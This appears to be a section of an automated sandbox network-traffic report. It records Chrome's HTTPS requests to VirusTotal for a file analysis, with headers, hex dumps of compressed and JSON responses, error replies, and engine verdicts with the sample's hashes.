                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 31 0d 0a 00 0d 0a 30 66 66 63 0d 0a 00 00 00 00 02 ff ec 5a 59 93 db 36 b6 7e 9f 5f 41 33 99 be e4 5c 92 ad 7d a1 cc ee eb d8 4e 8d ab e2 71 ca ed e4 21 5d 5d 0e 44 42 12 d3 14 a9 02 48 a9 35 6a fd f7 f9 b0 70 d1 66 3b 73 a7 ea be 5c 3f b4 29 2c 07 07 07 67 fd 00 b3 e0 d4 e0 39 8b c3 dc 9c 58 9c 26 33 6f 43 a7 2b 12 3e be 5e 14 e9 e3 3a ff 5c c4 9f 97 24 4e 83 2f f4 3d 3f df 3f d8 de aa e0 0b eb fe 7e d0 1f f7 da 4e 7b d4 1e f5 9d 76 ab dd 1b 3b 83 56 7b 34 74 06 ed 6e b7 e3 0c 3a 83 5e d7 19 0c db fd 8e d3 1d 74 87 5d 67 3c 68 75 d1 db 69 f5 c6 0f ce ae df 19 0f 46 be 45 9d dc 89 ed e0 66 17 5b ed 61 7b 64 4f d6 84 19 3c 88 ad 61
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100010ffcZY6~_A3\}Nq!]]DBH5jpf;s\?),g9X&3oC+>^:\$N/=??~N{v;V{4tn:^t]g<huiFEf[a{dO<a
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC1408INData Raw: 98 15 71 28 5e 01 73 dc 1a d7 46 98 2d 97 05 8c 6b 6b d4 b6 e7 18 19 33 12 c1 7e be a0 0c ae ca 11 de e5 2f c6 d1 3f 74 1a 8c aa 13 36 84 6e 5f 47 99 08 54 d7 ef 7e 36 48 14 31 18 9e 20 f4 cb c7 9f 4c e3 7f 96 b0 31 9a ad 29 ab 84 27 64 68 bc bc 26 10 ce 35 a4 83 ff 88 b1 60 74 06 51 e6 f9 8a fb d7 d7 11 5d d3 44 78 54 ee ad 63 06 8e b3 9c 24 1e 38 be c6 30 30 96 86 f4 5a 90 5c c7 74 63 1a 39 9c 09 c5 2e 3f 4f 13 92 3e 56 e2 59 72 97 14 79 26 24 c4 e9 32 16 92 87 9c df 64 c6 36 2b 8c 0d 49 73 03 9d 62 04 2c 1f 8a 20 1c 04 bf 2d f9 12 e7 7b 78 cc 50 7e b8 b7 bc 3c d2 38 0a cc 5a 70 d5 a2 bc 98 62 35 e9 c9 4c e3 76 03 a5 72 13 82 05 c1 9e 56 1d bd 7b b5 f1 6b bd ce f5 b1 62 de 18 bf 6b cf 78 e4 f1 ae ae 5e 58 3a 0a 59 34 58 7a bf bd f7 a0 38 10 49 fe 0b a7
                                                                                                                                                                                                                    Data Ascii: q(^sF-kk3~/?t6n_GT~6H1 L1)'dh&5`tQ]DxTc$800Z\tc9.?O>VYry&$2d6+Isb, -{xP~<8Zpb5LvrV{kbkx^X:Y4Xz8I
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC1408INData Raw: 00 98 94 38 0e e9 09 64 b9 23 32 2b e9 07 b8 57 fd 6e 78 84 d1 a0 df ef c1 99 48 08 ef 32 a5 b3 f8 8a 22 0b 62 e5 31 00 e7 93 e4 d4 4a af e5 24 b1 fe de 91 a8 e0 45 f2 c7 e8 c7 65 c2 4f 4b c2 1e 9b 84 25 c6 78 99 f0 59 d0 e7 32 f9 06 48 d4 5c 44 a2 97 97 17 69 60 1f 5a d2 4d 38 e4 8c b0 87 c3 e1 b8 77 91 5e 92 91 08 b6 53 1f dc 39 09 03 b5 4a 53 ca 7e cc 0a 96 4b d4 65 ef b4 07 ed 71 fb 22 d5 55 52 f0 9a a4 57 fe 3c c3 dd 60 d4 ee 5c 24 83 a4 00 d9 ad 5c f1 b2 18 91 89 64 9b 8f 28 78 72 fa 31 9e 2f 64 76 0f 65 15 c0 ee 45 c2 0d 84 ed 32 e1 30 c9 c2 c7 0a 68 da 3b dd 7e ab d3 3a 21 39 f9 12 9a 0d dc 7a d4 c5 81 0a dc 5a a2 e1 12 c0 ee f5 da 12 c9 ee f6 3a 03 e0 cc 0a b0 ee 02 d2 16 98 77 1b 30 37 c0 6b 22 70 e8 61 7b 88 81 02 e8 1e 8d 61 7d 0a e8 1e b7 87
                                                                                                                                                                                                                    Data Ascii: 8d#2+WnxH2"b1J$EeOK%xY2H\Di`ZM8w^S9JS~Keq"URW<`\$\d(xr1/dveE20h;~:!9zZ:w07k"pa{a}
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC281INData Raw: e2 ba fc 91 22 eb 07 c8 0b af a1 9e 87 f8 46 d5 a6 4b 71 a3 83 87 2f 08 bb b8 cc c3 13 19 04 40 a4 a7 49 c6 be b8 f0 34 8b b6 ae 1c e6 18 df 75 bb 5d 7b a2 de 7b 00 8d 61 34 41 3a b3 a6 58 5d 31 5d bf 55 10 fc e3 05 09 77 57 b8 63 17 fb 36 fa ab 27 a3 b5 d2 9b b6 ee 81 3a 03 68 7b b0 77 e5 3e 52 00 ae fb ef ea 6d df 37 70 f1 87 dd 92 3c b9 68 c8 17 9a 57 f1 5b 24 80 aa 51 c8 a4 05 e2 b5 54 c4 6d e0 44 5e 09 aa cc 16 a9 a9 8f 5a 5e 35 6d 18 59 f9 e2 4f 73 bd 9d 22 8f 87 10 7f 3d 92 ed 34 63 78 b1 e1 b7 b1 01 9e 25 b8 b0 56 e7 34 e5 38 44 d1 a3 a4 63 4f 1a a7 ac 3b d0 32 11 89 e3 1c 75 58 1a 69 d6 e5 3c c8 74 3a b7 f7 0a 9a 77 70 2d 57 07 e8 4a 22 82 fd 26 87 07 12 c1 d5 71 73 8e 16 b3 9b d0 59 ee b7 19 5d 4e ca 16 26 80 0b d9 74 99 96 f6 e0 3b b1 a2 df 6b
                                                                                                                                                                                                                    Data Ascii: "FKq/@I4u]{{a4A:X]1]UwWc6':h{w>Rm7p<hW[$QTmD^Z^5mYOs"=4cx%V48DcO;2uXi<t:wp-WJ"&qsY]N&t;k
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC503INData Raw: 31 0d 0a bf 0d 0a 31 65 61 0d 0a 22 39 6c 8e 33 ca 2e 25 70 50 3b d0 42 88 07 2a 21 f2 ba a8 14 6c a9 22 5f 16 88 26 6b 88 b4 a5 a1 2f 9d 3e 14 63 22 1e 60 cc 92 6c e3 2b bd 9b c8 4b e8 aa 91 02 e4 5d 21 41 69 b2 79 b8 1d 75 50 5a 0a c7 2c 9f b7 d8 13 c3 b9 4c bd 71 f8 4a 28 5f 92 73 23 97 d3 fc 48 9d 2d 37 e3 3e 95 7b ac 94 10 0f 71 96 5f 57 df 52 61 a4 0a 79 7d 1c ef 37 31 5c 1a b8 37 14 53 8c f6 c9 cc 06 bf e5 d1 cb 33 12 0f cb 4e ae a3 77 e7 0f e6 e4 fc f0 82 21 c7 fb 08 3c 40 a5 7e 9a 1d db f2 d9 25 d7 73 2d ae 4e 0f 0a b1 a0 d2 2e c4 f7 be 16 7f a5 ee 78 a6 c2 e1 18 75 f8 d8 9f e5 d5 39 db 6a 90 7b f1 3e e8 41 ed 44 bf 8c 14 ee 47 3a 38 ad a4 28 38 d5 9b 3f e3 2c 0d a7 1c 56 3f d1 3b 3f 10 b8 4f ed bf 4b c7 22 db ec 7d 49 a3 5a 8a af e7 e7 08 a3 59
                                                                                                                                                                                                                    Data Ascii: 11ea"9l3.%pP;B*!l"_&k/>c"`l+K]!AiyuPZ,LqJ(_s#H-7>{q_WRay}71\7S3Nw!<@~%s-N.xu9j{>ADG:8(8?,V?;?OK"}IZY
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    184192.168.2.164993674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:36 UTC558OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/analyse HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC262INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Allow: POST, HEAD, OPTIONS
                                                                                                                                                                                                                    X-Cloud-Trace-Context: ca5771a9c6829b3f041ef11d4b270b0c
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:37 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 178
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC178INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><title>405 Method Not Allowed</title><h1>Method Not Allowed</h1><p>The method is not allowed for the requested URL.</p>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    185192.168.2.164994074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC942OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM3NTE0NDgyMDQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTM2LjAzNg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC884INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 2254c91fd76d135b8530a34df3804373
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:37 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 1125
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:37 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC524INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44 6b 7a 4e 67 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 61 6e 61 6c 79 73 69 73 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 61 6e 61 6c 79 73 65 73 2f 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==", "type": "analysis", "links": { "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3ND
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC601INData Raw: 20 22 73 74 61 74 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 61 6c 69 63 69 6f 75 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 75 73 70 69 63 69 6f 75 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 64 65 74 65 63 74 65 64 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 66 69 72 6d 65 64 2d 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 61 69 6c 75 72 65 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "stats": { "malicious": 0, "suspicious": 0, "undetected": 0, "harmless": 0, "timeout": 0, "confirmed-timeout": 0, "failure": 0,


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    186192.168.2.164994174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC549OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:38 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 89384fdb006c13087a769b3454022dd4
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:38 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:38 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    187192.168.2.164994274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:39 UTC938OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTkyMTA1NDE2MjItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTM4LjYy
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:40 UTC884INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: f171b91dea61a6fc66a652b36765f4c2
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:40 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 2721
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:40 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:40 UTC524INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44 6b 7a 4e 67 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 61 6e 61 6c 79 73 69 73 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 61 6e 61 6c 79 73 65 73 2f 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==", "type": "analysis", "links": { "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3ND
                                                                                                                                                                                                                    2024-04-25 19:55:40 UTC1408INData Raw: 20 20 20 20 20 20 20 20 22 56 69 72 49 54 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 56 69 72 49 54 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 39 2e 35 2e 36 39 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "VirIT": { "method": "blacklist", "engine_name": "VirIT", "engine_version": "9.5.690", "engine_update": "20240424", "category": "undetected",
                                                                                                                                                                                                                    2024-04-25 19:55:40 UTC548INData Raw: 22 3a 20 22 31 2e 33 2e 31 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 74 61 74 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 61 6c 69 63 69 6f 75 73 22 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 75 73 70 69 63
                                                                                                                                                                                                                    Data Ascii: ": "1.3.1.0", "engine_update": "20240425", "category": "undetected", "result": null } }, "stats": { "malicious": 1, "suspic
                                                                                                                                                                                                                    2024-04-25 19:55:40 UTC241INData Raw: 73 68 61 32 35 36 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 64 35 22 3a 20 22 32 38 32 64 61 30 32 30 37 39 38 61 66 62 64 37 65 66 66 34 30 63 65 38 35 34 65 38 64 30 31 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 31 22 3a 20 22 32 39 39 36 32 64 61 61 32 64 37 36 38 37 31 63 34 66 32 65 37 36 30 39 61 38 33 39 38 34 65 63 64 34 33 31 64 34 34 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 22 3a 20 31 30 36 33 38 37 30 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: sha256": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358", "md5": "282da020798afbd7eff40ce854e8d01f", "sha1": "29962daa2d76871c4f2e7609a83984ecd431d44c", "size": 1063870 } }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    188192.168.2.164994374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
